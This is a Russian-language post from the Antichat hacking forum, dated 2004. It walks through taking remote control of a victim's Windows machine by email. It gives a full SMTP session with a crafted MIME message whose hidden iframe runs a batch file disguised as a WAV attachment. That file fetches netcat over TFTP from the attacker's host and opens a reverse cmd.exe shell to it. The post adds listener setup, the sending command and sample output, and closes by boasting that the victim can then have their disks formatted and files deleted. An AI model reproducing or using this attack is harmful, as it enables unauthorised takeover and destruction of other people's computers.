Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   E-Mail (https://forum.antichat.xyz/forumdisplay.php?f=14)
-   -   Удаленный контроль (https://forum.antichat.xyz/showthread.php?t=2326)

Ламер----- 22.07.2004 20:48

И так создаем hack.txt, с таким вот MIME-кодом.

</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">hello hacker-4.comcor-tv.ru
mail from:<petia@yandex.ru>
rcpt to:<fedy@mail.ru>
data
subject: Attack
MIME-Version: 1.0
Content-Type: multipart/related; type="multipart/alternative"
boundary="1"
X_Priority:3
X-Mail-Priority:Normal
X-Usenet:1

--1

Content-Type:multipart/alternative; boundary="2"

--2

Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<html>
<head>
</head>
<body bgcolor=3D#ffffff>
<iframe src=3Dcid:THE-CID height=3D0></iframe>
=)))
</body>
</html>

--2--

--1

Content-Type: audio/x-wav; name="attack.bat"
Content-Transfer-Encoding: quoted-printable
Content-ID: <THE-CID>

start /B /WAIT tftp -i hacker-4.comcor-tv.ru get nc.exe
C:\winnt\system32\nc.exe
start /B nc.exe -d -e cmd.exe hacker-4.comcor-tv.ru 2002
--1
.
quit[/QUOTE]<span id='postcolor'>

Вот это наш Активный код </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">start /B /WAIT tftp -i hacker-4.comcor-tv.ru get nc.exe
C:\winnt\system32\nc.exe
start /B nc.exe -d -e cmd.exe hacker-4.comcor-tv.ru 2002[/QUOTE]<span id='postcolor'>
В первой строке команда запускает сеанс МС_ДОС без создания нового диалога.
В открывшемся сеансе МС_ДОС сначало исполняется команда tftp предназначеная для выгрузки файлов из локального компа на удаленный хост (параметр put) и загрузки файлов из уделенного хоста на локальный комп (параметр get).
У нас команда tftp загружает двоичный код (параметр -i) с нашего хоста по адресу hacker-4.comcor-tv.ru в папку c\winnt\nc.exe локального компа.
Во второй строке происходит запуск загруженной проги-сервера netcat которая запускает командную оболочку cmd.exe атакованного компа и устанавливает соединение с прогой-клиентом netcate запущеной на нашем хосте в режими прослушки 2002 порта.
Файл hack.txt готов? http://forum.antichat.ru/iB_html/non...cons/smile.gif
Тогда запускаем прогу TFTPD32 представляющую собой клиент TFTP (для танкистов:Прога обслуживающая запросы TFTP)
Почему используем TFTPD32? Потому что на компах с вынь 2000\ХР в отличии от Никса,протокол TFTP поддерживается в ограниченом обьеме и для исполнения команды tftp на хосте с которого мы собираемся загрузить файл должен быть установлен клиент tftp - ( танкистам &quot; иначе команда нихера исполнятся не будет) http://forum.antichat.ru/iB_html/non...cons/smile.gif
И так мы запускаем TFTPD32 и нам отображается некий диалог.
Клиент TFTPD32 должен быть настроин следующим образом.
В поле Base Directory (надо указать папку с файлом nc.exe)(для танкистов c\winnt\nc.exe)
В списке Server interface (надо ввести Ip адрес сетевого хоста с которого будет выполняться загрузка файла.) (снова для танкистов IP следует ввести свой)
После запуска и настройки проги,начинается прослушка стандартного порта (69) протокола TFTP в ожидании запросов.
Далее
В отдельном диалоге сеанса МС_ДОС запускаем следующую прогу-клиента удаленного управления.
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">nc-vv-L-p 2002[/QUOTE]<span id='postcolor'>
Вылезит такое сообщение

listening on (any) 2002 (снова танкистам =) началась
работа в режиме клиента удаленного

управления,прослушивающег запросы к порту 2002,поступающие с любого хоста)
Далее
Открываем ещё один диалог сеанса МС_ДОС и с помощью вот этой команды
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">type hack.txt | nc-vv [EMAIL=petia@yandex.ru]petia@yandex.ru[/EMAIL] 25[/QUOTE]<span id='postcolor'> Если все сраслось по плану и жертва открыла письмо в Аутлук Експрес (на других не тестировалось)
На его экране на милисекунду появится диалог сеанса МС_ДОС. То в диалоге клиента TFTPD32 (т.е у тебя) Должны отобразиться сообщения о ходе процесса загрузки файла.
Пример.

</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">Connection received from xx.xx.xxx. port xx
Read request for fail <nc.exe> Mode octet
<nc.exe>: send 118 blks, xxxx bytes in 1 s. 0 blk resent[/QUOTE]<span id='postcolor'>

Одновременно в диалоге сеанса МС_ДОС в котором запущен клиент удаленного управления netcate отобразится сообщение об установлении связи с атакованным компом.

теперь с хостом можно делать,что хочеш.
Форматить диски,удалять файлы,и.т.д
Одним словом жертва превращена в твоего стевого раба.


Время: 03:50